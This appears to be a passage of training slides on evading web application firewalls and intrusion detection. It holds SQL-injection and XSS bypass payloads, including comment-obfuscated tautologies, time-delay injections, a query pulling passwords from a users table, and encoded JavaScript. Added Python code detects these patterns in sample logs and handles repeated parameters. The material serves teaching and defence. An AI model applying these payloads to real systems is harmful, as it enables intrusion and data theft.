    • Try characters one by one in the GET or POST to see if specific characters are blocked WAFs very often drop your traffic (Burp will usually time out and your browser will show an error) Instead of ◦ or '1'='1'-- Try ◦ Or/**/'2'/**/LiKe/**/'2 Instead of ◦ waitfor delay '0:0:20'-- Try ◦ Wait+for+dElay+'0:0:20'-- Defeating IDS/IPS/WAF
    • Instead of ◦ admin Try ◦ char(0x61)%2bchar(0x64)%2bchar(0x6D)%2bchar(0x69)%2bchar(0x6E) Instead of ◦ ' union select password from users --%20 Try ◦ '(union(select(password)from(users))--((1)) Defeating IDS/IPS/WAF
    • Change GET to POST or POST to GET or Use HEAD Use IPv6 Change IPv4 version header to 5 (IPv5) HTTP Parameter Pollution ◦ http://victim.com/admin.php?userid=1&userid=2 ⚫ASP concatenates: 1,2 ⚫PHP takes last occurrence ⚫Java takes first occurrence Change Content Type ◦ Content-Type: multipart/; boundry=0000 ⚫(evasion of ModSecurity CRS) Defeating IDS/IPS/WAF
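The HTTP Parameter Pollution bullet above, as an added example (not code from the slides): how the three stacks named on the slide would each read userid=1&userid=2 (the framework rules are the slide's, encoded as lambdas), and a strict parser that reports repeated keys so the application can reject the request instead of letting a filter and the backend disagree about the value.

```python
from urllib.parse import parse_qsl

# How the slide says each stack reads a repeated parameter such as
# userid=1&userid=2: ASP concatenates, PHP keeps the last, Java keeps the first.
FRAMEWORK_RULES = {
    "asp": lambda values: ",".join(values),
    "php": lambda values: values[-1],
    "java": lambda values: values[0],
}


def param_as_seen_by(query, key, framework):
    """Value the named stack would hand the application for `key`, or None."""
    values = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == key]
    if not values:
        return None
    return FRAMEWORK_RULES[framework](values)


def strict_params(query):
    """Defensive parse: keep the first value of each key and report every key
    that was repeated, so the handler can refuse the request outright."""
    params, repeated = {}, set()
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key in params:
            repeated.add(key)
        else:
            params[key] = value
    return params, sorted(repeated)
```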
    • There are many ways in a database to do the same thing ◦ @@version ◦ version() ◦ select banner from v$version where banner like ‘Oracle%’ ◦ select version from v$instance Defeating IDS/IPS/WAF
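A detection-side example added here (not code from the slides) that serves the Triggering SQL Injection list, the blind and error-based examples, and the Defeating IDS/IPS/WAF slides together: request targets are decoded twice, lowercased and stripped of /**/ comments before matching, which is what lets one set of patterns catch both the plain payloads and the Or/**/LiKe and Wait+for+dElay spellings. The log lines are constructed samples in combined log format.

```python
import re
from urllib.parse import unquote_plus

# Patterns distilled from the slides' trigger, error-based, blind and evasion
# lists. They run against a NORMALIZED request (decoded, lowercased, comments
# stripped), which defeats the /**/ and Wait+for+dElay spellings.
SQLI_PATTERNS = {
    "tautology":   re.compile(r"\b(or|and)\s+'?\w+'?\s*(=|like)\s*'?\w+"),
    "comment_end": re.compile(r"(--|#)\s*$"),
    "mssql_delay": re.compile(r"wait\s*for\s+delay"),
    "mysql_sleep": re.compile(r"\b(sleep|benchmark)\s*\("),
    "pg_sleep":    re.compile(r"\bpg_sleep\s*\("),
    "oracle_oob":  re.compile(r"utl_(http|inaddr)\."),
    "union":       re.compile(r"\bunion\s*(all\s*)?\(?\s*select\b"),
    "version":     re.compile(r"@@version|\bversion\s*\(\s*\)|v\$(version|instance)"),
    "error_xpath": re.compile(r"\b(extractvalue|updatexml)\s*\("),
}

# Combined-format access log line: we only need the client IP and the target.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed sample log (not real traffic); payload shapes follow the slides.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2014:10:01:02 -0700] "GET /showmovies.aspx?name=rad HTTP/1.1" 200 512
10.0.0.5 - - [10/May/2014:10:01:09 -0700] "GET /showmovies.aspx?name=rad'%20waitfor%20delay%20'0:0:20'%20-- HTTP/1.1" 200 512
10.0.0.7 - - [10/May/2014:10:02:11 -0700] "GET /login.php?user=admin'/**/or/**/2/**/LiKe/**/2--/**/&pw=x HTTP/1.1" 302 0
10.0.0.7 - - [10/May/2014:10:02:40 -0700] "GET /search.php?q=Wait+for+dElay+'0:0:20'-- HTTP/1.1" 500 0
10.0.0.9 - - [10/May/2014:10:03:01 -0700] "GET /showmovies.php?name=rad'%20and%20ExtractValue(1,CONCAT(0x5c,(SELECT%20@@version)))%20--%20 HTTP/1.1" 500 0
10.0.0.9 - - [10/May/2014:10:03:30 -0700] "GET /search.aspx?q=%2527%2520union%2520select%25201%252C%2540%2540version%2520-- HTTP/1.1" 200 0
"""


def normalize(raw):
    """Undo double encoding (%2527 -> %27 -> '), lowercase, turn inline
    comments into spaces and collapse whitespace."""
    s = raw
    for _ in range(2):
        s = unquote_plus(s)
    s = s.lower()
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).strip()


def classify_request(target):
    """Sorted list of pattern names that match the request target."""
    norm = normalize(target)
    return sorted(name for name, pat in SQLI_PATTERNS.items() if pat.search(norm))


def scan_log(text):
    """(client_ip, target, findings) for every line that trips a pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        findings = classify_request(target)
        if findings:
            hits.append((ip, target, findings))
    return hits
```

Time-based payloads also show up as response-time outliers, so pairing these matches with the request duration field is a useful second signal.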
    • Non alphanumeric xss ◦ eval("aler"+(!![]+[])[+[]])("xss") ◦ window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![ ]]+(!![]+[])[+!![]]+(!![]+[])[+[]]] Defeating IDS/IPS/WAF
    • Questions?